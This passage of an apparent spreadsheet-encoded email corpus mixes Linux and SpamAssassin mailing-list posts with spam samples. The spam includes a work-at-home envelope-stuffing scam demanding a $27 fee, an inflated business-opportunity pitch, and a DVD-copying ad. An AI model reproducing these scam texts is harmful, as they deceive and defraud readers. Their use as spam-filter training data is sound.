 all the historical examples of dickhead-ness that have proceeded the
 US.
 After all, we're the only country who gets unruly when it comes to
 issues.   Thats why its always just the Americans at those crazy WTO
 meetings...  Right, Owen?
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-08-13 at 07:25, Gary Peck wrote:
 &gt; On Mon, Aug 12, 2002 at 11:06:18PM +0000,  Angles  Puglisi wrote:
 &gt; &gt; Michel Alexandre Salim (salimma1@yahoo.co.uk) wrote*:
 &gt; &gt; Limbo beta2 ? I'm running Limbo 7.3.92 with kernel 4.2.18-5.58, is what I am running
 &gt; &gt; an "older" version of the Limbo beta, it is it "the" limbo beta?
 &gt; 
 &gt; The current version of the Limbo beta is 7.3.93 (yeah, they should
 &gt; have renamed it, but they didn't). It's in the same
 &gt; redhat/linux/beta/limbo directory on the ftp servers. Just check the
 &gt; redhat-release package to find out which version is on the server. 
 &gt; Looking at ftp.redhat.com, the current one is redhat-release-7.3.93-2.
 &gt; 
 &gt; If you're using GNOME2 from the beta, I'd upgrade as there were some
 &gt; important bugfixes since the first beta. The only thing to watch out
 &gt; for is that Limbo2 switched gcc to 3.2, which is once again
 &gt; incompatible with the previous gcc (v3.1 shipped in Limbo1).
 Eeeek... I hope they aren't intending to release a new RH with a new gcc
 which hasn't yet been released (again). Bad enough the first time, and
 I'm sure it gave RedHat a lot of embarrassment.
 FWIW, I've yet to compile apt on the gcc 3.2 snapshot in RawHide - apt's
 C++ makes several rather poor assumptions on what iterators are, and in
 addition doesn't use namespaces at all.
 For non-C++ folk, this basically means it needs porting. I've got a
 reasonable way along, now, and I'll send a suitable patch to Connectiva
 or somewhere when I succeed - I can't find anything on Connectiva's site
 itself for this.
 In addition, the rpmlib stuff has changed slightly - I've not really
 started on this, but it's mainly just arguments added. The rpmlib
 documentation seems somewhat poor, though, unless I've missed it.
 Dave.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Digital radio playlists are prohibited?!
</t>
  </si>
  <si>
    <t xml:space="preserve">Anyone heard of this law before?
 &gt; Q. Can I get a playlist?
 &gt; A. We are unable to offer a playlist. The Digital Performance Right in 
 &gt; Sound Recordings Act of 1995 passed by Congress prevents us from 
 &gt; disclosing such information. The Digital Law states that if one is 
 &gt; transmitting a digital signal, song information cannot be 
 &gt; pre-announced. It is a Music Choice policy not to release a playlist of 
 &gt; upcoming or previously played songs.
 Recently, MusicChoice upgraded their website with a very important 
 service, as far as I'm concerned: real-time song info from their 
 website. My DirecTV receiver is up on a shelf (and its display scrolls 
 intermittently); and I'm surely not going to fire up my projector while 
 listening to the "radio", so I'm quite happy that I can retrieve r/t 
 song info with URLs like:
 http://backstage.musicchoice.com/songid/channels/soundsoftheseasons.asp
 http://backstage.musicchoice.com/songid/channels/rap.asp
 http://backstage.musicchoice.com/songid/channels/opera.asp
 etc...
 Now, if I were a more eager hacker, I'd write up little WSDL stubs for 
 these event streams (they're clearly not worried about load, since their 
 own web pages specify 15 sec meta-refresh) and then feed 'em through a 
 content router to alert me to cool songs. Heck, cross-reference the 
 service to CDDB and... :-)
 RK
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 11 Sep 2002 01:24:46 +0200 
 Robert Waldner &lt;waldner@waldner.priv.at&gt; wrote:
 &gt; On Tue, 10 Sep 2002 09:27:12 PDT, J C Lawrence writes:
 &gt;&gt; I run exmh on my desktops at home and at work with the resulting exmh
 &gt;&gt; windows being displayed on both my work and home desktops (gratis SSH
 &gt;&gt; X11 forwarding).  In fact, your message was read and replied to (this
 &gt;&gt; message) while at work, using an exmh instance running on my home
 &gt;&gt; machine.
 &gt; So you have 4 copies (1+1 per desktop) of exmh running?
 Yes.
 One of the nicer aspects of exmh's colour handling is that while I have
 the default background for the message pane set to black, the second
 insance of exmh displaying to a given $DISPLAY will set the background
 of the message pane to darkslategray.  Very nice as it provides an
 instant visual cue as to which is which.  (No: I've not checked where it
 gets that colour selection from).
 &gt; That's what I usually do, but what I'd really like would be some
 &gt; automagism to tell them "Flist", "Rescan Folder", which I now do
 &gt; manually whenever I'm going to work at the "other" machine.
 &lt;nod&gt;
 -- 
 J C Lawrence                
 ---------(*)                Satan, oscillate my metallic sonatas. 
 claw@kanga.nu               He lived as a devil, eh?		  
 http://www.kanga.nu/~claw/  Evil is a name of a foeman, as I live.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Sep 17, 2002 at 10:19:13AM -0700, Chuck Murcko wrote:
 &gt; Probably because we have this pesky 1st Amendment thing here. Still, 
 &gt; lots of us in the States have developed a disturbing tendency to shout 
 &gt; down or (in recent years) shackle in legal BS opinions, thoughts, and 
 &gt; individual behaviors we don't agree with.
 &gt; 
 Except that parroting the party line doesn't really require much
 freedom of speech. Now if you had posted something from a left of
 center source, you would have been shouted down in flames, buried in 
 ad hominem attacks, and probably get your name added to an FBI list. 
 Besides the basic rule in the United States now is "I'll defend your
 rights to say anything you want, but if it isn't appropriately
 neoconish, well, don't expect to work":
 HHS Seeks Science Advice to Match Bush Views
 By Rick Weiss
 Washington Post Staff Writer
 Tuesday, September 17, 2002; Page A01
 The Bush administration has begun a broad restructuring of the
 scientific advisory committees that guide federal policy in areas such
 as patients' rights and public health, eliminating some committees
 that were coming to conclusions at odds with the president's views and
 in other cases replacing members with handpicked choices. 
 ...
 http://www.washingtonpost.com/wp-dyn/articles/A26554-2002Sep16.html
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Earn 6 figures in 90 days, No Cost Information,
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi-tech industry leader in an emerging 90 billion dollar 
 environmental marketplace seeks U.S. and Canadian 
 Entrepreneurs for market expansion. We have an immediate 
 need and are willing to train and develop aggressive 
 individuals in local markets.  Candidates must be 
 motivated individuals with the entrepreneurial drive to 
 run their own independent business part-time, full-time 
 or spare-time from home backed with full company support. 
        START MAKING MONEY FROM HOME with it now!!
 ----&gt;&gt;&gt;&gt;&gt;http://www.doubleplushosting.com/bizop2/&lt;&lt;&lt;----- 
 Here are some highlights:
 Huge compensation benefits program offered:
 * Uncapped commissions and bonuses.
 * Qualified Mgrs. part-time avg. up to $6,293/mo. or more!
 * Top Mgrs avg. over $200k/yr.
 Total Flexibility:
 * No commuting necessary! Work from home environment.
 * P/T or F/T positions available.
 * Create your own schedule and hours.
 Company Support:
 * Each independently run business is backed with full company support.
 * Up to 99.0% start up funding available, if needed.
 Complete Training:
 * Personal one-on-one training by top company leaders.
 * Proven step-by-step marketing system.
 * Product sells itself. (No selling or cold calling!).
 Perks:
 * Luxury company car ($800/mo).
 * National/International all expense paid vacations, business or pleasure.
 * Profit sharing program.
                START MAKING MONEY FROM HOME with it now!!
 ------&gt;&gt;&gt;&gt;&gt;http://www.doubleplushosting.com/bizop2/&lt;&lt;&lt;------
 To maintain regulatory compliance, we are unable to name our company in 
 this ad. However, you will soon discover that our 15 year old privately 
 held, hi-tech manufacturing company was recently recognized as the 82nd 
 faster growing U.S. company by INC 500.  We help solve a common problem 
 that up to 82% or more population suffers from and helps solve it quickly 
 and easily in a 90 billion dollar untapped marketplace.
 Candidate profile:
 * Strong work ethic required.
 * Honesty and integrity expected.
 * Management / leadership skills helpful, but not necessary.
 * No sales experience expected or needed. (Product sells itself!)
 LOCAL POSITIONS ARE GOING FAST.  Interested parties should respond IMMEDIATELY!
 *************************************************************
 To receive a FREE information pack including an audiocassette and 
 corporate video on this amazing hi-tech product and how YOU CAN 
 START MAKING MONEY FROM HOME with it now!!
 ------------&gt;&gt;&gt;&gt;&gt;http://www.doubleplushosting.com/bizop2/&lt;&lt;&lt;---------------
 -------
 To Be ExCerted - mailto:abo9@eudoramail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] 2.40: ready for release? *NO*
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --k3qmt+ucFURmlhDS
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Wed, Aug 28, 2002 at 07:42:13PM +0100, Justin Mason wrote:
 &gt; OK guys -- I reckon it's now Good Enough, modulo some minor score
 &gt; tweaking, or commenting of some more broken/high-FP-ing rules.
 &gt;=20
 Some make test errors here, too:
 Failed 6/20 test scripts, 70.00% okay. 17/182 subtests failed, 90.66% okay.
 J
 --=20
 Jesus Climent | Unix System Admin | Helsinki, Finland.
 http://www.HispaLinux.es/~data/  |  data.pandacrew.org
 ------------------------------------------------------
 Please, encrypt mail address to me: GnuPG ID: 86946D69
 FP: BB64 2339 1CAA 7064 E429  7E18 66FC 1D7F 8694 6D69
 ------------------------------------------------------
 Registered Linux user #66350 Debian 3.0 &amp; Linux 2.4.19
 Look at my fingers: four stones, four crates. Zero stones? ZERO CRATES!
 		--Zorg (The Fifth Element)
 --k3qmt+ucFURmlhDS
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9bTJMZvwdf4aUbWkRAkpYAKDp15ePjG0prpbb/JSMICw6X3xOegCdGsU8
 tdax7QmKey5Vul5DwFDESVc=
 =lyD1
 -----END PGP SIGNATURE-----
 --k3qmt+ucFURmlhDS--
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-devel mailing list
 Spamassassin-devel@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Newby to Linux looking for information on cvs
</t>
  </si>
  <si>
    <t xml:space="preserve">On 0020 +0100 %{!Thu, Sep 05, 2002 at 11:53:32PM +0100}, Darragh wrote:
 &gt; the help that I received today.  Then though I tried to build them.  I
 &gt; started by trying the w3 program.  I used the following lines which produced
 &gt; some strange results.  Would any one be able to set me straight?
 &gt; 
 &gt; ./configure --with-emacs --prefix=/usr/local/src/beta/w3 --exec-prefix=/usr/
 &gt; local/src/beta/w3 --with-url=/url/url
 One thing I _think_ you might be doing slightly wrong is your
 specification of prefixes.  --prefix is the directory to be used as root
 for _installing_ files.  Typically packages use /usr/local as default
 (so binaries might then go in /usr/local/bin, documentation in
 /usr/local/doc and so forth).
 Normally, I find it sufficient to put --prefix=/usr/local, and do not
 further specify things like --exec-prefix.
 Maybe you have a special reason for using the prefixes you chose, in
 which case ignore me!
 &gt; That worked fine so I moved to the next step.
 &gt; make
 &gt; At the bottem of the text I got the following messages:
 &gt; Cannot open load file: /url/url/url-vars.el
 &gt; make[1]: *** [custom-load.el] Error 255
 &gt; make[1]: Leaving directory `/usr/local/src/beta/w3/lisp'
 &gt; make: *** [w3] Error 2
 &gt; 
 &gt; When I got around to trying the url package I had no problems.  In saying
 &gt; that this doesn't necessarily mean that I was doing it right so below are
 &gt; the commands I used.
 &gt; ./configure --with-emacs --prefix=/url/url --exec-prefix=/url/url
 I'd make the same remarks about prefixes here.  I would use the command
     ./configure --with-emacs --prefix=/usr/local
 To get w3 to compile, I think the with-url flag you should use is
     --with-url=/usr/local/share/emacs/site-lisp/
 (Assuming you compiled/installed url with --prefix=/usr/local
 Since you appear to have installed url in /url/url, configure w3 with
 ./configure --with-emacs --prefix=/usr/local/ --with-url=/url/url/share/emacs/site-lisp
 A command you would have found useful would have been
     find / -name 'url-vars.el' -print
 Which would have told you where the url-vars.el file was installed.
 A program which is very useful is checkinstall
 http://asic-linux.com.mx/~izto/checkinstall/
 It allows you to install packages from source while still registering
 them in the package management system of your distro (rpm,deb,tgz).
 Instead of "make install" type "checkinstall", and a package is put
 together and installed for you.  Makes uninstallation simpler than it
 might otherwise be.
 -- 
 Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
 Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 09:53:55AM +0100, Damian O' Sullivan mentioned:
 &gt; &gt;  Curiously, when I go into the boot prom, an use
 &gt; &gt;  "set_params" I can tell it to mount /dev/hda2 as root. But 
 &gt; &gt; then it uses the PROM copy of the kernel (dodgy 2.2.16 
 &gt; &gt; kernel), which doesn't know ext3, so wants to fsck up my disk.
 &gt; Boot prom on a cobalt? Is this an old mips based one? How did you get to it?
  This is actually a raq3. Though, I do have an old raq2 that Liam was
 helping me get netbsd on (about all you'll get on a 16MB machine these
 days).
  Anyway, I wussed out, and copied hda1:/ to hda2:/boot and set the bootfs
 to be hda2. It worked, though it's mounting an ext3fs as ext2. But I'm
 getting there.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get the Child Support You Deserve                            11.180
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Fight The Risk of Cancer!
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Join the Web's Fastest Growing Singles Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 5) Start Your Private Photo Album Online!
 http://www.adclick.ws/p.cfm?o=283&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG-Social] Re: [ILUG] Dermot Beirne/Dublin/IE/Exel is out of the office.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Aug 03, 2002 at 12:00:34AM +0100, Paul Jakma wrote:
 &gt; finally, the email-disclaimers advocacy site 
 &gt; 
 &gt; 	http://www.emaildisclaimers.com/
 sites like this make me question my opposition to capital punishment.
 "This month's Q&amp;A: Is it better to prepend or append disclaimer
 statements?"  augh!  and they admit they're pointless - in reality they're
 just the legal world's version of mandatory email fashion accessories.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Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Earn $300-$1000 A Week From Your Home!............
</t>
  </si>
  <si>
    <t xml:space="preserve">
 HOME-MAILERS NEEDED!
 $300-$1000 PLUS WEEKLY
 Simple, pleasant work...you do at home.
 Dear Friend,
 Are you seeking a rewarding second income? Would you like to set your
 own work schedule? Work the hours you choose? Earn extra income for
 your family? If so, then we may have the answer. Current statistics show
 that by the year 2010, 40-60% of the American work-force will be working
 from home. Get a jump on your future and secure a job through us. Our
 company provides a service to thousands of people and businesses across
 the United States. With your help, we can reach and provide a better
 service to more of these people and businesses, faster and at a lower cost
 than our competitors. We handle a marketing program called the
 Home-Mailers Program, which consists of envelope processing and mailing.
 These positions require no special skills or experience, just a sincere desire
 to GET STARTED, and EARN MONEY!
   YOU CAN EARN GOOD MONEY!!!
    Potential incomes range from $300 to $1000 weekly or more. Pay rate is
 based on a $2.00 per envelope basis. The average Home-Mailer
 stuffs anywhere from 150 to 500 envelopes a week, depending on the
 amount of free time they have available. The envelopes you process will
 make you a substantial income. You'll find this work, done easily and
 quickly, can double or even triple your income. With just one or two hours
 per day you will be excitedly surprised at how easy we've made it and how
 profitable this work actually is. You can earn enough money working in
 your spare time to purchase that new car or boat you've been wanting,
 pay off credit cards, bills, or even take a vacation. Maybe just add more
 financial security for yourself or your family. Whatever the reason, you can't
 go wrong.
   ALL BUSINESS CAN BE DONE RIGHT FROM YOUR OWN HOME
   You can start the same day you receive our materials and begin receiving
 money within a matter of days. These positions require no prior experience
 or special skills. Under contract you will receive everything you need to
 get you up and running as fast as possible. Paychecks are mailed out every
 two weeks on the 1st and 16th of the month.
   HELP SOLVE YOUR MONEY PROBLEMS
    If you are looking for an excellent extra income to relieve financial
 pressures, you owe it to yourself to investigate this program. Naturally, no
 company can afford to send out costly materials to everyone who writes in
 asking for it. Therefore, we must ask each applicant for a one time
 application processing fee of $27.00. This fee covers processing and
 materials you will receive upon your acceptance and is returned to you
 with your first paycheck. It also assures us that you are serious about
 working with our company as a Home-Mailer. We will not ask or require
 you to pay us for any additional information, instructions, or materials to
 stay with us, and stay with us as long as you desire. If for any reason you
 are not accepted into the Home-Mailers Program, your processing fee will
 be sent directly back to you. There is no hassle. However, you must act
 promptly. At this time we are in need of dependable Home-Mailers in your
 area, of whom may start in the very near future. There are only a limited
 number of positions needed for each region of the country and as soon as
 we have enough people to complete the mailing needs in your area we
 will not be offering any more applications. We need your help now! So if
 you're a productive, positive person we're looking forward to working with
 you.
   SIMPLE, EASY, AND PROFITABLE, THIS PROGRAM IS THE BEST
   WAY TO MAKE AN EXCELLENT INCOME AT HOME.
   If this sounds like something you might be interested in, read on. If not,
 thank you for your time. We hope to hear from you soon.
 Sincerely Yours,
 Ron M. Jenkins
 Home-Mailing Division Manager
   Start earning now. Here's what you need to do.
 (1) Read, complete, and return the attached application.
 (2) Enclose a one time materials and processing fee of $27.00.
 (3) All correspondence and materials will be addressed to you.
 Please open on day of arrival.
 (4) Follow all instructions when processing and mailing.
 (5) If you find yourself pressed for time, you can stop work
 with us and come back at a later date, but we must insist you
 maintain a high level of quality when processing and mailing.
   OUR STEP-BY-STEP SYSTEM OF BROCHURE MAILING IS SIMPLE AND OUR
   INSTRUCTIONS ARE WRITTEN IN AN EASY TO FOLLOW LANGUAGE.
   There is a way to earn a substantial income at home...
   The Home-Mailers Program.
   YOUR SERVICES ARE NEEDED NOW.
   Please Respond Today! Positions are limited and time can affect
   your acceptance for desired positions.
   FILL OUT APPLICATION AND RETURN TO OUR ADDRESS BELOW
  Last Name:____________________  First Name:_______________________
  Mailing Address:_________________________________________________
  City:____________________________ State:_______________________
  Zip Code:______________________
  Home Tel.#: (_______)________-_________  Age:______
  Date of Birth:_____/_____/______
  E-mail Address:______________________________
  Do you work more than 40 hours per week?  [  ]Yes   [  ]No
  (READ AND SIGN BELOW) By signing, I state that I am interested in
  becoming a Home-Mailer for your company and wish to have all of the
  necessary materials and instructions sent to me at the above address.
  Signature_______________________________  Date:______/______/______
   Code # CY0795
 **Processing fee must be in US FUNDS ONLY please.**
 *If applicant is under 18 have a guardian sign above and indicate
 age of applicant.
 *If you don't have access to a printer, you may copy the application
 onto regular notebook paper. Please use pen. (NOTE: Please be sure to
 include the Code # on your application. Applications without a Code #
 can not be processed.)
 *All fees are one time fees. You will not be required, asked, or need
 to pay us any other fees to stay with us and stay as long as you
 like. All potential pay rates are Guaranteed!
 *Please note that personal checks may be held up to 30 days for
 bank clearance. If you are eager to get started, you should use a
 Money Order for your processing fee.
 Send Application and a $27.00 Check or Money Order (US FUNDS ONLY)
 made payable to NetServ
 Send to:
 NetServ
 2135A des Laurentides Blvd
 Suite 174
 Laval, Quebec, Canada H7M 4M2
   Because we are a company recruiting people from the public we must
 assure you that we are the BEST company to work with and that we provide
 the MOST PROFITABLE income. Because we require an initial fee to get
 started, many people are skeptical, and miss out on a great opportunity.
 This fee covers our expenses for materials, postage, handling, and the time
 it takes us to get you started. It also assures us that you are serious about
 working with the Home-Mailers Program. We know that current Home-
 Mailers are happy and making an excellent income just from reading their
 testimonials. This makes us happy and enables us to succeed and continue
 our success together. Here are just a couple of the many testimonials
 received from Home-Mailers:
   I want to thank you for giving me this opportunity
   to work for your company. It couldn't have come along
   at a better time. The work is so simple and the pay is
   incredible. My wife and I have been stuffing envelopes
   together part-time and are exceeding what either of us
   make at our full-time jobs. Thanks again!
      J. Thomas ------ Miami, FL
   Thank you for everything! I was having trouble
   making ends meet at my present employment. But
   thanks to you and your Home-Mailers Program, I was
   able to pay off some old bills and put money in the
   bank. Now I'm looking forward to taking a well
   deserved vacation.
      M. Daniels ----- Seattle, WA
 Why do we need Home-Mailers? The cost of supplying an office is more
 expensive than most people may think. The cost of office space per square
 foot, + taxes employing mailing staff, + taxes employing supervisors, +
 taxes, medical insurance, dental insurance, and office liability insurance,
 multiplied by each region we cover, all involving paperwork, accountants
 and more taxes. WE NEED YOUR SERVICES TO SAVE TIME AND MONEY!
 Your role in our company is as an Independent Commission Mailer, not an
 employee. We will not take taxes from your paychecks and we cannot offer
 medical or dental insurance. As a Home-Mailer, your residence and many
 other aspects of everyday living may be able to be declared business
 expenses. Receive cash-back on your taxes! You may request copies of
 personal materials at any time at no charge to yourself. All business can 
 be done by mail, from your own home. You can start the same day you
 receive our materials and begin receiving money within days and have a
 steady income as long as you desire. These positions require no prior
 experience or special skills. There are many distribution companies who
 want to expand their businesses, but do not want to pay the higher 
 expenses. It is much easier to have independent Home-Mailers earn 
 money doing this work themselves. This program is designed to help 
 people cash in with a company who needs Home-Mailers. The Home-Mailers
 Program has been perfected so that it has become one of the most 
 successful and profitable programs ever and is supplying people around the
 world with excellent primary and secondary incomes. We invite you to take
 part in our success. The money you earn is up to you. We do not require 
 that you mail a certain number of envelopes each week. You can take on
 whatever amount of business that fits your schedule and you can stop
 whenever you want, there are no obligations. There is no need to do any
 door to door selling or phone soliciting. You may work in the comfort of your
 own home, choose your own hours, set your own pace. No need to leave
 your present job. Form workshops with your friends or get the whole family 
 to join in. The possibilities are UNLIMITED!
   DUE TO COMPANY EXPANSION
   YOUR SERVICES ARE NEEDED NOW.
   Thank you, and we're looking forward to working
   with you, together in the future.
   &lt;B&gt;
 &lt;/B&gt;
 &lt;/FONT&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you know which app is making the connection?
 At 20:18 03/08/02 +0100, you wrote:
 &gt;Hello all
 &gt;I'm looking for advice. My pc has developed a disturbing tendency of trying
 &gt;to access IP 62.17.143.253 without my consent. It has got to the stage where
 &gt;normal web-browsing is almost impossible.
 &gt;I have checked IP address on RIPE database and I know precisely who is being
 &gt;called. I contacted that company on 14 July, when the problem first arose
 &gt;and asked for a remedy but (surprise) got no reply.
 &gt;A helpful person on the ie.comp list suggested Adaware spyware removal. I
 &gt;ran this and haven't had a problem again until today.
 &gt;The offending program is obviously not in Adaware db. (I run adaware with
 &gt;current ref files every day now).?
 &gt;Any suggestions, please,  for removing whatever the f*** is causing this
 &gt;from my pc?
 &gt;Brian
 &gt;
 &gt;
 &gt;_______________________________________________
 &gt;IIU mailing list
 &gt;IIU@iiu.taint.org
 &gt;http://iiu.taint.org/mailman/listinfo/iiu
 ========================================================================
 Martin Whelan | Dise Design | www.deisedesign.com | Tel : 086-8888975
 " Our core product Diseditor  allows organisations to publish information 
 to their web site in a fast and cost effective manner. There is no need for 
 a full time web developer, as the site can be easily updated by the 
 organisations own staff.
 Instant updates to keep site information fresh. Sites which are updated 
 regularly bring users back. Visit www.deisedesign.com/deiseditor.html for a 
 demonstration "
 Diseditor  " Managing Your Information "
 ========================================================================
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Friend, Copy ANY DVD or Playstation Game with this software......
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------103227703017104
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 Friend,Now you can copy DVD's and Games
 http://www.terra.es/personal9/iop1008/
 BACKUP DVD VIDEO's WITH YOUR CD-R BURNER
 With 321 studio's software, you can now copy
 any DVD and Playstation Game.  Never buy another 
 backup DVD movie again.  Just copy it!
 This is the first time this software is being made
 available to the public. All the software you need 
 to burn your own DVD Video, is included in 321 Studio's 
 software package DVD Copy Plus!  The movies will play 
 in a standard DVD player. With detailed, easy to follow, 
 step-by-step instructions, you can BURN your own DVD 
 Video using nothing more than your DVD-ROM 
 and CD-R drives. Purchase a copy! Click below.
 http://www.terra.es/personal9/iop1008/
 Order today and receive!
 *Step by Step Interactive Instructions
 *All Software Tools Included On CD
 *No DVD Burner Required
 *FREE Live Technical Support
 *30 Day Risk Free Trial Available
 With DVD Copy Plus you can backup Your DVD Movies with 
 the same 74min or 80min CD-R's you've used in the past 
 to create audio CD's. Our software compresses the large 
 DVD files on your standard DVD to VCD, SVCD, and DivX 
 much the same way the popular MP3 format compresses audio.  
 Order today and start burning
 http://www.terra.es/personal9/iop1008/
 Thank You,
 CopymyDVD
 http://inglesa.net/unsub.php?client=atomicDOT
 We take your privacy very seriously and it is our policy never to send
 unwanted email messages. This message has been sent to zzzz@spamassassin.taint.org
 because you originally joined one of our member sites or you signed up
 with a party that has contracted with atomicDOT. Please
 http://tilw.net/unsub.php?client=atomicDOT&amp;msgid=17090200005
 to Unsubscribe (replying to this email WILL NOT unsubscribe you). 
 TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8;
 --------------103227703017104
 Content-Type: text/html; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Backup your DVD's&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 6.00.2600.0" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;DIV&gt;&lt;/DIV&gt;
 &lt;BLOCKQUOTE 
 style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV&gt;&lt;/DIV&gt;
   &lt;TABLE cellSpacing=0 cellPadding=0 width=525 align=center bgColor=#ffffff 
   border=0&gt;
     &lt;TBODY&gt; 
     &lt;TR&gt; 
       &lt;TD width="33"&gt;&lt;IMG height=1 src="images/spacer.gif" width=33 border=0&gt;&lt;/TD&gt;
       &lt;TD width="174"&gt;&lt;IMG height=1 src="images/spacer.gif" width=174 border=0&gt;&lt;/TD&gt;
       &lt;TD width="360"&gt;&lt;IMG height=1 src="images/spacer.gif" width=360 border=0&gt;&lt;/TD&gt;
       &lt;TD width="33"&gt;&lt;IMG height=1 src="images/spacer.gif" width=33 border=0&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD colSpan=4&gt;&lt;a href="http://www.terra.es/personal9/iop1008/"&gt;&lt;IMG height=253 src="http://www.terra.es/personal9/iop1008/images/mailer8_r1_c1.gif" 
         width=600 useMap=#Map border=0&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD background=http://www.terra.es/personal9/iop1008/images/mailer8_r2_c1.gif height=181&gt;&lt;/TD&gt;
       &lt;TD vAlign=top align=left colSpan=2 height=181&gt; 
         &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;With DVDCopyPlus 
           and PowerCDR5.0 you can copy and burn your&lt;/FONT&gt;&lt;/P&gt;
         &lt;UL&gt;
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;DVD Movies&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Playstation &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;MP3s, AVIs and all 
             other multimedia Files&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Software, Music 
             CDs (perfect RAW data duplication)&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;NEW! Burn to CD-R 
             or DVD-R&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;
         &lt;/UL&gt;
         &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Protect your 
           investments by backing up your CD, DVD, MP3, Data and Game collections 
           with burned copies that really work! Separately, DVDCopyPlus and PowerCDR5.0 
           are over $100 worth of software that you can purchase bundled right 
           now for just $49.99!&lt;/FONT&gt;&lt;/P&gt;
         &lt;P align=center&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
         size=2&gt;&lt;B&gt;&lt;FONT size=5&gt;THAT'S 50% OFF!&lt;BR&gt;
           &lt;/FONT&gt;&lt;A 
         href="http://www.terra.es/personal9/iop1008/"&gt;MORE DETAILS&lt;/A&gt; &lt;A 
         href="http://www.terra.es/personal9/iop1008/"&gt;ORDER NOW&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;/TD&gt;
